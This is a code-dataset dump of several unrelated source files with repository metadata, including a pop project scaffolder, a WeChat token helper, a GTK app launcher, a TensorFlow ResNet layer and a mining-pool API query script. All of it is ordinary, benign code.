restarts # +1: to finish the current one # stop pg_receivewal so we cannot process new WAL segments # add more WAL segments # restart # We should now process all created segments, not only the ones which were created after pg_receivewal was restarted
2.163243
2
pop/mods/pop/seed.py
smokeytheblair/pop
48
6627911
''' Seed a new project with a directory tree and first files ''' # Import python libs import os SETUP = '''#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Import python libs import os import sys import shutil from setuptools import setup, Command NAME = '%%NAME%%' DESC = ('') # Version info -- read without importing _locals = {} with open('{}/version.py'.format(NAME)) as fp: exec(fp.read(), None, _locals) VERSION = _locals['version'] SETUP_DIRNAME = os.path.dirname(__file__) if not SETUP_DIRNAME: SETUP_DIRNAME = os.getcwd() with open('README.rst', encoding='utf-8') as f: LONG_DESC = f.read() with open('requirements.txt') as f: REQUIREMENTS = f.read().splitlines() class Clean(Command): user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): for subdir in (NAME, 'tests'): for root, dirs, files in os.walk(os.path.join(os.path.dirname(__file__), subdir)): for dir_ in dirs: if dir_ == '__pycache__': shutil.rmtree(os.path.join(root, dir_)) def discover_packages(): modules = [] for package in (NAME, ): for root, _, files in os.walk(os.path.join(SETUP_DIRNAME, package)): pdir = os.path.relpath(root, SETUP_DIRNAME) modname = pdir.replace(os.sep, '.') modules.append(modname) return modules setup(name=NAME, author='', author_email='', url='', version=VERSION, install_requires=REQUIREMENTS, description=DESC, long_description=LONG_DESC, long_description_content_type='text/x-rst', python_requires='>=3.6', classifiers=[ 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Development Status :: 5 - Production/Stable', ], packages=discover_packages(), %%ENTRY%% cmdclass={'clean': Clean}, ) ''' ENTRY = '''entry_points={ 'console_scripts': [ '%%NAME%% = %%NAME%%.scripts:start', ], },''' SCRIPT = '''#!/usr/bin/env python3 import pop.hub def start(): hub = pop.hub.Hub() hub.pop.sub.add(dyne_name='%%NAME%%') hub.%%NAME%%.init.run() ''' INIT = '''def __init__(hub): # Remmeber not to start your app in the __init__ function # This function should just be used to set up the plugin subsystem # Add another function to call from your run.py to start the app pass def run(hub): hub.pop.conf.integrate(['%%NAME%%'], cli='%%NAME%%', roots=True, loader='yaml') print('%%NAME%% works!') ''' REQ = 'pop\n' CONF = '''CLI_CONFIG = {} CONFIG = {} GLOBAL = {} SUBS = {} DYNE = { '%%NAME%%': ['%%NAME%%'], %%DYNE%%} ''' VER = "version = '1'\n" def new(hub): ''' Given the option in hub.opts "seed_name" create a directory tree for a new pop project ''' hub.PATH = os.getcwd() name = hub.opts['seed_name'] for dyne in hub.opts['dyne']: hub.pop.seed.mkdir(name, dyne) hub.pop.seed.mkdir(name, dyne, 'contracts') if hub.opts['type'] == 'v': hub.pop.seed.mkdir(name) hub.pop.seed.mksetup(name, entry=False) hub.pop.seed.mkversion(name) hub.pop.seed.mkconf(name) hub.pop.seed.mkreq(name) hub.pop.seed.mkreadme(name) else: hub.pop.seed.mkdir(name, name) hub.pop.seed.mkdir(name, name, 'contracts') hub.pop.seed.mksetup(name) hub.pop.seed.mkscript(name) hub.pop.seed.mkversion(name) hub.pop.seed.mkconf(name) hub.pop.seed.mkreq(name) hub.pop.seed.mkrun(name) hub.pop.seed.mkinit(name) hub.pop.seed.mkreadme(name) def mkdir(hub, *args): ''' Create the named dir ''' path = hub.PATH for dir_ in args: path = os.path.join(path, dir_) if not os.path.isdir(path): try: os.makedirs(path) except Exception: print('Failed to make {}'.format(path)) continue if dir_ == 'scripts' and len(args) == 1: continue def mkreq(hub, name): ''' ''' path = os.path.join(hub.PATH, 'requirements.txt') with open(path, 'w+') as fp: fp.write(REQ) def mksetup(hub, name, entry=True): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, 'setup.py') setup_str = SETUP.replace('%%NAME%%', name) if entry: setup_str = setup_str.replace('%%ENTRY%%', ENTRY.replace('%%NAME%%', name)) else: setup_str = setup_str.replace('%%ENTRY%%', '') with open(path, 'w+') as fp: fp.write(setup_str) def mkscript(hub, name): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, name, 'scripts.py') script_str = SCRIPT.replace('%%NAME%%', name) with open(path, 'w+') as fp: fp.write(script_str) def mkrun(hub, name): ''' Create the convenience run.py script allowing the project to be executed from the local directory ''' path = os.path.join(hub.PATH, 'run.py') run_str = SCRIPT.replace('%%NAME%%', name) run_str += '\n\nstart()' with open(path, 'w+') as fp: fp.write(run_str) def mkinit(hub, name): ''' Create the intial init.py ''' path = os.path.join(hub.PATH, name, name, 'init.py') init_str = INIT.replace('%%NAME%%', name) with open(path, 'w+') as fp: fp.write(init_str) def mkversion(hub, name): ''' Create the version.py file ''' path = os.path.join(hub.PATH, name, 'version.py') with open(path, 'w+') as fp: fp.write(VER) def mkconf(hub, name): ''' Create the version.py file ''' path = os.path.join(hub.PATH, name, 'conf.py') dyne_str = '' for dyne in hub.opts['dyne']: dyne_str += f" '{dyne}': ['{dyne}'],\n" conf_str = CONF.replace('%%NAME%%', name) conf_str = conf_str.replace('%%DYNE%%', dyne_str) with open(path, 'w+') as fp: fp.write(conf_str) def mkreadme(hub, name): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, 'README.rst') eqchars = '=' * len(name) readme_str = f'{eqchars}\n{name.upper()}\n{eqchars}\n' with open(path, 'w+') as fp: fp.write(readme_str)
''' Seed a new project with a directory tree and first files ''' # Import python libs import os SETUP = '''#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Import python libs import os import sys import shutil from setuptools import setup, Command NAME = '%%NAME%%' DESC = ('') # Version info -- read without importing _locals = {} with open('{}/version.py'.format(NAME)) as fp: exec(fp.read(), None, _locals) VERSION = _locals['version'] SETUP_DIRNAME = os.path.dirname(__file__) if not SETUP_DIRNAME: SETUP_DIRNAME = os.getcwd() with open('README.rst', encoding='utf-8') as f: LONG_DESC = f.read() with open('requirements.txt') as f: REQUIREMENTS = f.read().splitlines() class Clean(Command): user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): for subdir in (NAME, 'tests'): for root, dirs, files in os.walk(os.path.join(os.path.dirname(__file__), subdir)): for dir_ in dirs: if dir_ == '__pycache__': shutil.rmtree(os.path.join(root, dir_)) def discover_packages(): modules = [] for package in (NAME, ): for root, _, files in os.walk(os.path.join(SETUP_DIRNAME, package)): pdir = os.path.relpath(root, SETUP_DIRNAME) modname = pdir.replace(os.sep, '.') modules.append(modname) return modules setup(name=NAME, author='', author_email='', url='', version=VERSION, install_requires=REQUIREMENTS, description=DESC, long_description=LONG_DESC, long_description_content_type='text/x-rst', python_requires='>=3.6', classifiers=[ 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Development Status :: 5 - Production/Stable', ], packages=discover_packages(), %%ENTRY%% cmdclass={'clean': Clean}, ) ''' ENTRY = '''entry_points={ 'console_scripts': [ '%%NAME%% = %%NAME%%.scripts:start', ], },''' SCRIPT = '''#!/usr/bin/env python3 import pop.hub def start(): hub = pop.hub.Hub() hub.pop.sub.add(dyne_name='%%NAME%%') hub.%%NAME%%.init.run() ''' INIT = '''def __init__(hub): # Remmeber not to start your app in the __init__ function # This function should just be used to set up the plugin subsystem # Add another function to call from your run.py to start the app pass def run(hub): hub.pop.conf.integrate(['%%NAME%%'], cli='%%NAME%%', roots=True, loader='yaml') print('%%NAME%% works!') ''' REQ = 'pop\n' CONF = '''CLI_CONFIG = {} CONFIG = {} GLOBAL = {} SUBS = {} DYNE = { '%%NAME%%': ['%%NAME%%'], %%DYNE%%} ''' VER = "version = '1'\n" def new(hub): ''' Given the option in hub.opts "seed_name" create a directory tree for a new pop project ''' hub.PATH = os.getcwd() name = hub.opts['seed_name'] for dyne in hub.opts['dyne']: hub.pop.seed.mkdir(name, dyne) hub.pop.seed.mkdir(name, dyne, 'contracts') if hub.opts['type'] == 'v': hub.pop.seed.mkdir(name) hub.pop.seed.mksetup(name, entry=False) hub.pop.seed.mkversion(name) hub.pop.seed.mkconf(name) hub.pop.seed.mkreq(name) hub.pop.seed.mkreadme(name) else: hub.pop.seed.mkdir(name, name) hub.pop.seed.mkdir(name, name, 'contracts') hub.pop.seed.mksetup(name) hub.pop.seed.mkscript(name) hub.pop.seed.mkversion(name) hub.pop.seed.mkconf(name) hub.pop.seed.mkreq(name) hub.pop.seed.mkrun(name) hub.pop.seed.mkinit(name) hub.pop.seed.mkreadme(name) def mkdir(hub, *args): ''' Create the named dir ''' path = hub.PATH for dir_ in args: path = os.path.join(path, dir_) if not os.path.isdir(path): try: os.makedirs(path) except Exception: print('Failed to make {}'.format(path)) continue if dir_ == 'scripts' and len(args) == 1: continue def mkreq(hub, name): ''' ''' path = os.path.join(hub.PATH, 'requirements.txt') with open(path, 'w+') as fp: fp.write(REQ) def mksetup(hub, name, entry=True): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, 'setup.py') setup_str = SETUP.replace('%%NAME%%', name) if entry: setup_str = setup_str.replace('%%ENTRY%%', ENTRY.replace('%%NAME%%', name)) else: setup_str = setup_str.replace('%%ENTRY%%', '') with open(path, 'w+') as fp: fp.write(setup_str) def mkscript(hub, name): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, name, 'scripts.py') script_str = SCRIPT.replace('%%NAME%%', name) with open(path, 'w+') as fp: fp.write(script_str) def mkrun(hub, name): ''' Create the convenience run.py script allowing the project to be executed from the local directory ''' path = os.path.join(hub.PATH, 'run.py') run_str = SCRIPT.replace('%%NAME%%', name) run_str += '\n\nstart()' with open(path, 'w+') as fp: fp.write(run_str) def mkinit(hub, name): ''' Create the intial init.py ''' path = os.path.join(hub.PATH, name, name, 'init.py') init_str = INIT.replace('%%NAME%%', name) with open(path, 'w+') as fp: fp.write(init_str) def mkversion(hub, name): ''' Create the version.py file ''' path = os.path.join(hub.PATH, name, 'version.py') with open(path, 'w+') as fp: fp.write(VER) def mkconf(hub, name): ''' Create the version.py file ''' path = os.path.join(hub.PATH, name, 'conf.py') dyne_str = '' for dyne in hub.opts['dyne']: dyne_str += f" '{dyne}': ['{dyne}'],\n" conf_str = CONF.replace('%%NAME%%', name) conf_str = conf_str.replace('%%DYNE%%', dyne_str) with open(path, 'w+') as fp: fp.write(conf_str) def mkreadme(hub, name): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, 'README.rst') eqchars = '=' * len(name) readme_str = f'{eqchars}\n{name.upper()}\n{eqchars}\n' with open(path, 'w+') as fp: fp.write(readme_str)
en
0.487314
Seed a new project with a directory tree and first files # Import python libs #!/usr/bin/env python3 # -*- coding: utf-8 -*- # Import python libs import os import sys import shutil from setuptools import setup, Command NAME = '%%NAME%%' DESC = ('') # Version info -- read without importing _locals = {} with open('{}/version.py'.format(NAME)) as fp: exec(fp.read(), None, _locals) VERSION = _locals['version'] SETUP_DIRNAME = os.path.dirname(__file__) if not SETUP_DIRNAME: SETUP_DIRNAME = os.getcwd() with open('README.rst', encoding='utf-8') as f: LONG_DESC = f.read() with open('requirements.txt') as f: REQUIREMENTS = f.read().splitlines() class Clean(Command): user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): for subdir in (NAME, 'tests'): for root, dirs, files in os.walk(os.path.join(os.path.dirname(__file__), subdir)): for dir_ in dirs: if dir_ == '__pycache__': shutil.rmtree(os.path.join(root, dir_)) def discover_packages(): modules = [] for package in (NAME, ): for root, _, files in os.walk(os.path.join(SETUP_DIRNAME, package)): pdir = os.path.relpath(root, SETUP_DIRNAME) modname = pdir.replace(os.sep, '.') modules.append(modname) return modules setup(name=NAME, author='', author_email='', url='', version=VERSION, install_requires=REQUIREMENTS, description=DESC, long_description=LONG_DESC, long_description_content_type='text/x-rst', python_requires='>=3.6', classifiers=[ 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Development Status :: 5 - Production/Stable', ], packages=discover_packages(), %%ENTRY%% cmdclass={'clean': Clean}, ) entry_points={ 'console_scripts': [ '%%NAME%% = %%NAME%%.scripts:start', ], }, #!/usr/bin/env python3 import pop.hub def start(): hub = pop.hub.Hub() hub.pop.sub.add(dyne_name='%%NAME%%') hub.%%NAME%%.init.run() def __init__(hub): # Remmeber not to start your app in the __init__ function # This function should just be used to set up the plugin subsystem # Add another function to call from your run.py to start the app pass def run(hub): hub.pop.conf.integrate(['%%NAME%%'], cli='%%NAME%%', roots=True, loader='yaml') print('%%NAME%% works!') CLI_CONFIG = {} CONFIG = {} GLOBAL = {} SUBS = {} DYNE = { '%%NAME%%': ['%%NAME%%'], %%DYNE%%} Given the option in hub.opts "seed_name" create a directory tree for a new pop project Create the named dir Create and write out a setup.py file Create and write out a setup.py file Create the convenience run.py script allowing the project to be executed from the local directory Create the intial init.py Create the version.py file Create the version.py file Create and write out a setup.py file
2.322806
2
server/user/lls.py
lingochamp/open-wechat-scorer
4
6627912
<gh_stars>1-10 import asyncio import json import aiohttp class GetAccessTokenError(Exception): def __init__(self, message, original_exception=None, wx_response=''): super().__init__(message) self.original_exception = original_exception self.wx_response = wx_response async def get_access_token(session, config, req_dict): '''Sample implementation of getting access token. This routine expects your service to accept JSON-RPC 2.0 requests and be reachable on the HTTP URL that `config.wechatgo_jsonrpc_addr` specifies. JSON-RPC 2.0 Specification: http://www.jsonrpc.org/specification Request method is 'WeChat.AccessToken' Request params: - app_id: The AppID you will see on mp.weixin.qq.com Response fields: - access_token: The magic string that you need ''' GET_TOKEN_METHOD = 'WeChat.AccessToken' JSONRPC_CNTTYPE = 'application/json' TOKEN_SERVICE_JSONRPC_ADDR = 'http://localhost:8367/' GET_TOKEN_TIMEOUT_SEC = 1 try: TOKEN_SERVICE_JSONRPC_ADDR = config.token_service_jsonrpc_addr except AttributeError: pass # Use default value if not found try: GET_TOKEN_TIMEOUT_SEC = float(config.get_token_timeout_sec) except AttributeError: pass payload = { 'method': GET_TOKEN_METHOD, 'params': {}, 'jsonrpc': '2.0', 'id': 0, } headers = { 'Content-Type': JSONRPC_CNTTYPE, } async with session.post(TOKEN_SERVICE_JSONRPC_ADDR, data=payload, headers=headers, timeout=GET_TOKEN_TIMEOUT_SEC) as res: body = await res.text() try: token_obj = json.loads(body) return token_obj['result']['access_token'] except (json.decoder.JSONDecodeError, KeyError) as e: raise GetAccessTokenError(repr(e), e, body)
import asyncio import json import aiohttp class GetAccessTokenError(Exception): def __init__(self, message, original_exception=None, wx_response=''): super().__init__(message) self.original_exception = original_exception self.wx_response = wx_response async def get_access_token(session, config, req_dict): '''Sample implementation of getting access token. This routine expects your service to accept JSON-RPC 2.0 requests and be reachable on the HTTP URL that `config.wechatgo_jsonrpc_addr` specifies. JSON-RPC 2.0 Specification: http://www.jsonrpc.org/specification Request method is 'WeChat.AccessToken' Request params: - app_id: The AppID you will see on mp.weixin.qq.com Response fields: - access_token: The magic string that you need ''' GET_TOKEN_METHOD = 'WeChat.AccessToken' JSONRPC_CNTTYPE = 'application/json' TOKEN_SERVICE_JSONRPC_ADDR = 'http://localhost:8367/' GET_TOKEN_TIMEOUT_SEC = 1 try: TOKEN_SERVICE_JSONRPC_ADDR = config.token_service_jsonrpc_addr except AttributeError: pass # Use default value if not found try: GET_TOKEN_TIMEOUT_SEC = float(config.get_token_timeout_sec) except AttributeError: pass payload = { 'method': GET_TOKEN_METHOD, 'params': {}, 'jsonrpc': '2.0', 'id': 0, } headers = { 'Content-Type': JSONRPC_CNTTYPE, } async with session.post(TOKEN_SERVICE_JSONRPC_ADDR, data=payload, headers=headers, timeout=GET_TOKEN_TIMEOUT_SEC) as res: body = await res.text() try: token_obj = json.loads(body) return token_obj['result']['access_token'] except (json.decoder.JSONDecodeError, KeyError) as e: raise GetAccessTokenError(repr(e), e, body)
en
0.629978
Sample implementation of getting access token. This routine expects your service to accept JSON-RPC 2.0 requests and be reachable on the HTTP URL that `config.wechatgo_jsonrpc_addr` specifies. JSON-RPC 2.0 Specification: http://www.jsonrpc.org/specification Request method is 'WeChat.AccessToken' Request params: - app_id: The AppID you will see on mp.weixin.qq.com Response fields: - access_token: The magic string that you need # Use default value if not found
2.629972
3
scripts/termExtractor.py
tacitia/ThoughtFlow
0
6627913
import json import sys from topia.termextract import tag from topia.termextract import extract import nltk def uniqify(seq, idFun=None): # order preserving if idFun is None: def idFun(x): return x seen = {} result = [] for item in seq: marker = idFun(item) if marker in seen: continue seen[marker] = 1 result.append(item) return result def build(language='english'): # initialize the tagger with the required language tagger = tag.Tagger(language) tagger.initialize() # create the extractor with the tagger extractor = extract.TermExtractor(tagger=tagger) # invoke tagging the text s = nltk.data.load('testDocument.txt',format = 'raw') extractor.tagger(s) # extract all the terms, even the "weak" ones extractor.filter = extract.DefaultFilter(singleStrengthMinOccur=2) # extract return extractor(s) resultList = [] # get a results result = build('english') print result # for r in result: # discard the weights for now, not using them at this point and defaulting to lowercase keywords/tags # resultList.append(r[0].lower()) #print resultList
import json import sys from topia.termextract import tag from topia.termextract import extract import nltk def uniqify(seq, idFun=None): # order preserving if idFun is None: def idFun(x): return x seen = {} result = [] for item in seq: marker = idFun(item) if marker in seen: continue seen[marker] = 1 result.append(item) return result def build(language='english'): # initialize the tagger with the required language tagger = tag.Tagger(language) tagger.initialize() # create the extractor with the tagger extractor = extract.TermExtractor(tagger=tagger) # invoke tagging the text s = nltk.data.load('testDocument.txt',format = 'raw') extractor.tagger(s) # extract all the terms, even the "weak" ones extractor.filter = extract.DefaultFilter(singleStrengthMinOccur=2) # extract return extractor(s) resultList = [] # get a results result = build('english') print result # for r in result: # discard the weights for now, not using them at this point and defaulting to lowercase keywords/tags # resultList.append(r[0].lower()) #print resultList
en
0.700193
# order preserving # initialize the tagger with the required language # create the extractor with the tagger # invoke tagging the text # extract all the terms, even the "weak" ones # extract # get a results # for r in result: # discard the weights for now, not using them at this point and defaulting to lowercase keywords/tags # resultList.append(r[0].lower()) #print resultList
2.903149
3
fleamarket/urls.py
geraldofada/flea-market
0
6627914
<filename>fleamarket/urls.py from django.conf.urls.static import static from django.contrib import admin from django.urls import path from django.urls.conf import include from fleamarket import views, settings urlpatterns = [ path('', views.index, name='index'), path('', include('users.urls')), path('product/', include('product.urls')), path('category/', include('category.urls')), path('cart/', include('cart.urls')), path('payment/', include('payment.urls')), path('admin/', admin.site.urls), ] if settings.DEBUG: urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
<filename>fleamarket/urls.py from django.conf.urls.static import static from django.contrib import admin from django.urls import path from django.urls.conf import include from fleamarket import views, settings urlpatterns = [ path('', views.index, name='index'), path('', include('users.urls')), path('product/', include('product.urls')), path('category/', include('category.urls')), path('cart/', include('cart.urls')), path('payment/', include('payment.urls')), path('admin/', admin.site.urls), ] if settings.DEBUG: urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
none
1
1.881007
2
TouchLauncher/script.py
cafehaine/tiling4tablets
1
6627915
<reponame>cafehaine/tiling4tablets # Gui stuff import gi gi.require_version('Gtk', '3.0') from gi.repository import Gtk, Gdk # XDG stuff to fetch the application list from os.path import join from glob import glob from xdg import Menu, DesktopEntry from subprocess import call # String manipulation thingies import unicodedata import re def remove_accents(input_str): """ function by MiniQuark over at stackoverflow https://stackoverflow.com/a/517974/2279323 """ nfkd_form = unicodedata.normalize('NFKD', input_str) return u"".join([c for c in nfkd_form if not unicodedata.combining(c)]) def run_entry(entry): call(['exo-open',entry.path]) def fetch_application_list(): application_directories = [join(p,'applications') for p in Menu.xdg_data_dirs] entries = [] names = [] for directory in application_directories: for f in glob(join(directory,"**/*.desktop"), recursive=True): entry = DesktopEntry.DesktopEntry(f) if not entry.getNoDisplay() and entry.getName() not in names: names.append(entry.getName()) entry.path = f entries.append(entry) return sorted(entries, key=lambda e: remove_accents(e.getName().lower())) class FlowBoxWindow(Gtk.Window): def __init__(self): Gtk.Window.__init__(self, title="TouchLauncher") self.set_border_width(0) scrolled = Gtk.ScrolledWindow() scrolled.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC) flowbox = Gtk.FlowBox() flowbox.set_valign(Gtk.Align.START) flowbox.set_max_children_per_line(6) flowbox.set_selection_mode(Gtk.SelectionMode.NONE) flowbox.set_column_spacing(10) flowbox.set_row_spacing(10) flowbox.set_border_width(20) self.fill_flowbox(flowbox) scrolled.add(flowbox) self.add(scrolled) self.show_all() self.fullscreen() def fill_flowbox(self, flowbox): # close button icon = Gtk.Image.new_from_icon_name("window-close",6) icon.set_pixel_size(128) button = Gtk.Button(label="Close", image=icon, image_position=Gtk.PositionType.TOP, always_show_image=True) button.connect("clicked", Gtk.main_quit) flowbox.add(button) for app in fetch_application_list(): icon = Gtk.Image.new_from_icon_name(app.getIcon(),6) icon.set_pixel_size(128) button = Gtk.Button(label=app.getName(), image=icon, image_position=Gtk.PositionType.TOP, always_show_image=True) button.app = app button.connect("clicked", lambda e:(run_entry(e.app), Gtk.main_quit())) flowbox.add(button) win = FlowBoxWindow() win.connect("destroy", Gtk.main_quit) Gtk.main()
# Gui stuff import gi gi.require_version('Gtk', '3.0') from gi.repository import Gtk, Gdk # XDG stuff to fetch the application list from os.path import join from glob import glob from xdg import Menu, DesktopEntry from subprocess import call # String manipulation thingies import unicodedata import re def remove_accents(input_str): """ function by MiniQuark over at stackoverflow https://stackoverflow.com/a/517974/2279323 """ nfkd_form = unicodedata.normalize('NFKD', input_str) return u"".join([c for c in nfkd_form if not unicodedata.combining(c)]) def run_entry(entry): call(['exo-open',entry.path]) def fetch_application_list(): application_directories = [join(p,'applications') for p in Menu.xdg_data_dirs] entries = [] names = [] for directory in application_directories: for f in glob(join(directory,"**/*.desktop"), recursive=True): entry = DesktopEntry.DesktopEntry(f) if not entry.getNoDisplay() and entry.getName() not in names: names.append(entry.getName()) entry.path = f entries.append(entry) return sorted(entries, key=lambda e: remove_accents(e.getName().lower())) class FlowBoxWindow(Gtk.Window): def __init__(self): Gtk.Window.__init__(self, title="TouchLauncher") self.set_border_width(0) scrolled = Gtk.ScrolledWindow() scrolled.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC) flowbox = Gtk.FlowBox() flowbox.set_valign(Gtk.Align.START) flowbox.set_max_children_per_line(6) flowbox.set_selection_mode(Gtk.SelectionMode.NONE) flowbox.set_column_spacing(10) flowbox.set_row_spacing(10) flowbox.set_border_width(20) self.fill_flowbox(flowbox) scrolled.add(flowbox) self.add(scrolled) self.show_all() self.fullscreen() def fill_flowbox(self, flowbox): # close button icon = Gtk.Image.new_from_icon_name("window-close",6) icon.set_pixel_size(128) button = Gtk.Button(label="Close", image=icon, image_position=Gtk.PositionType.TOP, always_show_image=True) button.connect("clicked", Gtk.main_quit) flowbox.add(button) for app in fetch_application_list(): icon = Gtk.Image.new_from_icon_name(app.getIcon(),6) icon.set_pixel_size(128) button = Gtk.Button(label=app.getName(), image=icon, image_position=Gtk.PositionType.TOP, always_show_image=True) button.app = app button.connect("clicked", lambda e:(run_entry(e.app), Gtk.main_quit())) flowbox.add(button) win = FlowBoxWindow() win.connect("destroy", Gtk.main_quit) Gtk.main()
en
0.63586
# Gui stuff # XDG stuff to fetch the application list # String manipulation thingies function by MiniQuark over at stackoverflow https://stackoverflow.com/a/517974/2279323 # close button
2.537773
3
networks/layers/dense_resnet_value.py
google-research/ibc
180
6627916
<gh_stars>100-1000 # coding=utf-8 # Copyright 2022 The Reach ML Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Dense Resnet Value Network.""" import gin import tensorflow.compat.v2 as tf @gin.configurable class DenseResnetValue(tf.keras.layers.Layer): """Dense Resnet layer.""" def __init__(self, width=512, num_blocks=2): super(DenseResnetValue, self).__init__() self.dense0 = dense(width) self.blocks = [ResNetDenseBlock(width) for _ in range(num_blocks)] self.dense1 = dense(1) def call(self, x, training): x = self.dense0(x, training=training) for block in self.blocks: x = block(x, training=training) x = self.dense1(x, training=training) return x def dense(width): """Linear layer, no activation.""" return tf.keras.layers.Dense( width, activation=None, kernel_initializer='normal', bias_initializer='normal') class ResNetDenseBlock(tf.keras.layers.Layer): """Dense resnet block.""" def __init__(self, width): super(ResNetDenseBlock, self).__init__() self.dense0 = dense(width // 4) self.dense1 = dense(width // 4) self.dense2 = dense(width) self.dense3 = dense(width) self.activation0 = tf.keras.layers.ReLU() self.activation1 = tf.keras.layers.ReLU() self.activation2 = tf.keras.layers.ReLU() self.activation3 = tf.keras.layers.ReLU() def call(self, x, training): y = self.dense0(self.activation0(x)) y = self.dense1(self.activation1(y)) y = self.dense2(self.activation2(y)) if x.shape != y.shape: x = self.dense3(self.activation3(x)) return x + y
# coding=utf-8 # Copyright 2022 The Reach ML Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Dense Resnet Value Network.""" import gin import tensorflow.compat.v2 as tf @gin.configurable class DenseResnetValue(tf.keras.layers.Layer): """Dense Resnet layer.""" def __init__(self, width=512, num_blocks=2): super(DenseResnetValue, self).__init__() self.dense0 = dense(width) self.blocks = [ResNetDenseBlock(width) for _ in range(num_blocks)] self.dense1 = dense(1) def call(self, x, training): x = self.dense0(x, training=training) for block in self.blocks: x = block(x, training=training) x = self.dense1(x, training=training) return x def dense(width): """Linear layer, no activation.""" return tf.keras.layers.Dense( width, activation=None, kernel_initializer='normal', bias_initializer='normal') class ResNetDenseBlock(tf.keras.layers.Layer): """Dense resnet block.""" def __init__(self, width): super(ResNetDenseBlock, self).__init__() self.dense0 = dense(width // 4) self.dense1 = dense(width // 4) self.dense2 = dense(width) self.dense3 = dense(width) self.activation0 = tf.keras.layers.ReLU() self.activation1 = tf.keras.layers.ReLU() self.activation2 = tf.keras.layers.ReLU() self.activation3 = tf.keras.layers.ReLU() def call(self, x, training): y = self.dense0(self.activation0(x)) y = self.dense1(self.activation1(y)) y = self.dense2(self.activation2(y)) if x.shape != y.shape: x = self.dense3(self.activation3(x)) return x + y
en
0.827924
# coding=utf-8 # Copyright 2022 The Reach ML Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Dense Resnet Value Network. Dense Resnet layer. Linear layer, no activation. Dense resnet block.
2.451541
2
menu.py
ludoloops/miningpool
1
6627917
# -*- coding: utf-8 -* from urllib.request import Request, urlopen import json Coin=("adzcoin", "auroracoin-qubit", "bitcoin", "bitcoin-cash", "bitcoin-gold", "dash", "digibyte-groestl", "digibyte-qubit", "digibyte-skein", "electroneum", "ethereum", "ethereum-classic", "expanse", "feathercoin", "gamecredits", "geocoin", "globalboosty", "groestlcoin", "litecoin","maxcoin", "monacoin","monero","musicoin", "myriadcoin-groestl","myriadcoin-skein", "myriadcoin-yescrypt", "sexcoin", "siacoin", "startcoin", "verge-scrypt", "vertcoin", "zcash", "zclassic", "zcoin", "zencash") ApiData= "" Api= "&api_key="+ApiData Action=("getminingandprofitsstatistics", "getautoswitchingandprofitsstatistics", "getuserallbalances", "getblockcount","getblocksfound", "getblockstats", "getcurrentworkers","getdashboarddata","getdifficulty", "getestimatedtime", "gethourlyhashrates","getnavbardata", "getpoolhashrate", "getpoolinfo", "getpoolsharerate", "getpoolstatus", "gettimesincelastblock" ,"gettopcontributors", "getuserbalance", "getuserhashrate", "getusersharerate", "getuserstatus", "getusertransactions", "getuserworkers", "public") def menu_coin(): global c try: c except NameError: for index, group in enumerate(Coin): print("%s: %s" % (index, group)) c = int(input("coin to choose: ")) print("selected: ", Coin[c]) else: print("default coin: ", Coin[c]) def menu_action(): global a try: a except NameError: for index, group in enumerate(Action): print("%s: %s" % (index, group)) a = int(input("action: ")) print("selected:",Action[a]) else: print("default Action: ", Action[a]) def fonction(c): Url="https://"+Coin[c]+".miningpoolhub.com/index.php?page=api&action="+Action[a]+Api print("url:", Url) Req = Request(Url, headers={'User-Agent': 'Mozilla/5.0'}) Webpage = urlopen(Req).read() jsonToPython = json.loads(Webpage) print(jsonToPython) c=33 #comment to enable coin menu selection a=18 #comment to enable action menu selection menu_coin() menu_action() print() fonction(c)
